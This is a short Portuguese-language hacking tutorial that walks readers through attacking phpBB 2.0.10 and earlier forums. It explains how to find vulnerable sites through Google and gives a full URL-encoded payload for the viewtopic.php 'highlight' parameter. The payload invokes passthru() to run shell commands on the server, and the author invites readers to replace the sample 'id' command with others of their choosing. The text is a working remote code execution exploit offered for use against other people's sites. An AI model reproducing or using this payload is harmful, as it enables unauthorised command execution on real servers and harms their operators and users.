| PhpBB
2.0.10 e anteriores
Ai
galera, fiz mais esse tutorial aqui, rapidão,
so
pra explicar a galera, que quer saber oque esses exploits
estão fazendo e você nunca ve, deixe de ser scripts
kidie, blz?
seguinte,
pra encontrar o site, usa a cabeça
www.google.com.br
phpBB
2.0.10
ou
algo do tipo, abre a pagina,e no final dela, vc tem que ver
escrito
phpBB 2.0.10 ou menos que isso, a versão 2.0.11 nao
tem esta falha
perfeito?
Nao,
se fosse perfeito nao tinha a falha,
Encontrado
algum site com o 2.0.10 na lista,
ex:
http://forums.site.com/viewtopic.php?p=99999
você
entra no site, assim:
http://forums.site.com
entra
em alguma Categoria.
e
nessa categoria, vai haver muitos topicos, então, você
pega
o link, que vem depois do "t=" que seria a ID do
site,
no
normal ficaria viewtopic.php?p= viewtopic.php?f=
sei
la, mais la dentro, navegando no forum, vc vai encontrar
um
viewtopic.php?t= :D :D :D :D
ficando assim
http://forums.site.com/viewtopic.php?t=30
então
essa é a parte bugada, linda nao?
cole
isso aqui depois do endereço do site:
&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20id%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highligh
t=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%
68%5D%29.%2527
ficando
assim:
http://forums.site.com/viewtopic.php?t=30&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20id%3B%20%65%63%68
%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%
5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
note
que entre esse monte de % e numeros, existe um comando, id,
viram?
pois
é, a resposta no site(se o mesmo estiver vuln) será
sua id.
bonito
não?
basta
agora alterar o id por outros comandos que vao vir da sua
criatividade
ok?
Quer
Saber Mais?
irc.gigachat.net
#H4ck3rsBr
pitt3r_p4rk3r@hotmail.com
|
